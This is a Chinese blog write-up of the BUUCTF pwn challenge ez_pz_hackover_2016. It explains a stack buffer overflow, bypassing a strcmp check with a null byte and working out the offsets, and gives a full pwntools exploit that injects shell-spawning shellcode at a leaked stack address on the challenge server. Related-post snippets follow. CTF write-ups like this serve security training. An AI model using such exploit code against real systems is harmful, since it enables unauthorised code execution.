BUUCTF Pwn ez_pz_hackover_2016 WP

于 2025-03-03 16:52:19 发布
阅读量191 收藏
点赞数 1
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/145990974
版权

下载 checksec exeinfo

32位 IDA32打开 查看函数

首先会泄露变量s的地址(栈地址) 然后会对输入进行判断 存在crashme就将输入复制到dest变量

存在栈溢出 对于strcmp的比较 可以用 \x00 截断 

但是dest的偏移不是IDA所写的

动态调试:

可以看到 输入字符‘c’的位置应该在0x22 ebp在0x38 0x38-0x22=0x16  再加4字节到返回地址

泄露的栈地址和shellcode的地址有0x20的偏移 再加个4位的地址

exp:

from pwn import *

#p = process('./ez')
p = remote("node5.buuoj.cn", 25161)
context.log_level = 'debug'
context.arch = 'i386'
p.recvuntil("crash: ")
stack_addr = int(p.recv(10), 16)

#gdb.attach(p)
#pause()

shellcode = asm(shellcraft.sh())

payload = b'crashme\x00' + b'a' * (0x16 + 4 - 8) + p32(stack_addr - 0x20 + 4 ) + shellcode
p.sendline(payload)
p.interactive()

运行 得到flag:

ez_pz_hackover_2016
m0_52231248的博客
11-18 181
ez_pz_hackover_2016 Checksec: Ida: Fgets会读取我们的输入但存在一个strlen检查,我们知道strlen在读入/x00就会停止。 同时当我们的输入包含crashme的时候会进入vlun函数, Vlun函数里的memcpy会拷贝我们之前的输入,存在溢出 所以我们只需要构造payload=crashme/x00+偏移+返回地址+shellcode就行了 Crashme/X00到ebp的偏移: 0xffffcd58-0xffffcd42=0x16
BUUCTF ez_pz_hackover_2016
2401_88087539的博客
02-19 706
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF刷题之路--ez_pz_hackover_20161
qq_30528603的博客
06-28 375
因此这个函数里是存在栈溢出漏洞的,我们需要执行这个函数。因此我们需要在一开始的输入就构造好我们的shellcode,和shellcode的地址。根据IDA的提示,s数组应该在ebp的上面0x40c个字节处,而dest应该在ebp上面的0x32字节处.但是当我进行输入调试的时候发现ebp在我输入缓冲区的上面。ebp的偏移看到是0x38,我们输入的位置是0x22 ,因为63是c,72是r,0000不是我们输入的。将计就计,既然我们只有一次输入机会,那么我们构造完返回地址后,肯定跟的是我们的shellcode。
BUUCTFez_pz_hackover_2016
weixin_51055545的博客
02-14 1324
BUUCTFez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
[PWN] shellcode 2016_ez_pz_hackover
LDX的博客
12-01 434
PEN 栈溢出写入shellcode ez_pz_hackover_2016 BUUCTF刷题
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 633
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1486
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
2020_WHUCTF_Writeup(部分)
热门推荐
lysecl‘s blog
05-28 4万+
0x1 crypto bvibvi 首先要通过验证问题,对一个等式计算求解,简单的枚举求解即可。 通过验证过后,需要回答一系列问题,是关于B站BV号和AV号的。 题目给出BV号,让我们找出对应的AV号。多组正确后再给AV号,让我们找出BV号。 简单的了解了下Bilibili的av号和bv号知识后,发现 av号对应url格式为 url =‘https://www.bilibili.com/video/av’+aid bv号为 url =‘https://www.bilibili.com/video/’+b
图片Base64编码
2301_76620728的博客
06-16 7593
将图片base64进行编码。
[PWN] BUUCTF ez_pz_hackover_2016 1
空城惜梦的博客
06-08 832
[PWN] BUUCTF ez_pz_hackover_2016 1解题分析漏洞利用payload分析输入点与ebp距离的计算方法泄露的地址与shellcode的偏移量payload 解题分析 按照惯例先checksec一下,除了RELRO,其他都没开 执行,观察程序运行逻辑,给出一个地址,然后让我们输入name 32IDA打开程序,观察main函数,header()只是打印图形,chall()才是关键函数 在chall中先输出s的地址,之后fgets接收一个不大于1023(0x3ff)的字符到s的缓
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2455
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
memcpy
weixin_45959515的博客
08-26 216
memcpy指的是C和C++使用的内存拷贝函数,函数原型为void *memcpy(void *destin, void *source, unsigned n);函数的功能是从源内存地址的起始位置开始拷贝若干个字节到目标内存地址中,即从源source中拷贝n个字节到目标destin中。 memcpy(c, temp, sizeof(char) * temp_size); ...
3S软件
Zzzpiu的博客
12-29 500
地址:https://www.ixxin.cn/software.html 转载地址:https://www.ixxin.cn/software.html
buuctf pwn wp(第二波)花哨点的AAAA系列
月阴荒的博客
03-21 454
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
hi-z测试文件遮挡剔除
最新发布
05-16
hi-z测试文件遮挡剔除
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值